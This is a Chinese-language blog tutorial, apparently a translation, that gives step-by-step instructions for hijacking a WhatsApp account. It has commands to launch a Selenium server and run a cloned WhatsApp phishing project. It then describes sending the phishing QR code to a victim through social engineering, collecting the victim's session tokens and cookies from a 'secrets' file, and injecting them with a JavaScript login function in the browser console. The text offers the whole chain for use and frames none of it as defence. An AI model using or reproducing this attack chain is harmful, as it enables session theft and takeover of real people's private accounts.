最新消息:

如何社工获取Whatsapp账户?

原创翻译 Eternal 1884浏览 0评论

WhatsApp是一款非常受欢迎的跨平台应用程序,用于智能手机之间的通讯。本应用程序借助推送通知服务,可以即刻接收亲友和同事发送的信息。可免费从发送手机短信转为使用WhatsApp程序,以发送和接收信息、图片、音频文件和视频信息?。因此,也成为了一些黑客攻击的对象,从中获取用户信息。虽然近段是时间该公司加强了WhatsApp的密码强度,但是永远不要忘记,安全无绝对!

下面,让我们一起看看,如何利用社会工程的方法,来成功获取一个用户的WhatsApp账户。

1.首先让我们先下载一个 独立服务器的 jar 文件 下载地址:?http://www.seleniumhq.org/download/

2.打开命令终端,找到下载的文件。我直接放置在桌面,所以我输入以下命令进到桌面。

Cd /root/Desktop/

2016041701300739

3.执行该jar文件,输入命令:

./selenium-server-standalone-2.53.0.jar

2016041701320273

现在我们已经启动该服务器,接着我们打开另一个命令终端窗口。

4.下载whatAPP扥钓鱼页面。可以从github下载到。

git clone https://github.com/Mawalu/whatsapp-phishing.git

2016041701352657

接着我们进入该文件。

cd whatsapp-phishing

5.输入命令:

npm install

2016041701371420

该命令会安装所有需要的东西例如:node.js 和 socket.io等网页和服务器会请求的文件。如果出现错误或文件丢失提示,那么我们必须手动进行安装,否则将看不到效果。

npm install node.js

npm install socket.io

npm install wd

6.接着继续输入命令:

node index.js

2016041701423046

这将打开web服务及侦听端口。

7.打开我们的浏览器输入地址:

http://localhost:8080

2016041701453359

我们可以看到,用于钓鱼的whatAPP的二维码扫描登录已经生成。

8.现在我们就可以讲生成的二维码通过社工的方法发送给目标,并使其扫描该二维码,当目标输入它的用户身份信息后,我们就可以在本地电脑上,找到目标登录时的cookie信息及验证口令。我们有两种方法进行查看。

(1).我们可以从如下路径找到生成的数据文件。

/root/whatsapp-phishing/

我们可以看到一个名为 secrets 的文件。

2016041701524867

(2).我们同样也可以直接在命令终端上进行查看。找到密码口令。从 {“s”: and end with?? “c”:””}进行复制。

2016041701553372

9.现在,我们已经取得了该目标的token及cookies信息。接着我们打开浏览器进入whatAPP官方的web登录界面?https://web.whatsapp.com/ ,我们不能用手机直接扫描登录。因此,我们可以按F12 进入开发调试模式。在var t=后填写之前复制的信息。

2016041702070456

接着在后面跟上代码

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

最后跟上:

>login (t)

10.现在让我们重新加载浏览器,我们发现,我们已经成功登陆了目标的账户。

2016041702102811

原创翻译,转载请注明来自 即刻安全

 

 

转载请注明:即刻安全 » 如何社工获取Whatsapp账户?

您必须 登录 才能发表评论!



合作伙伴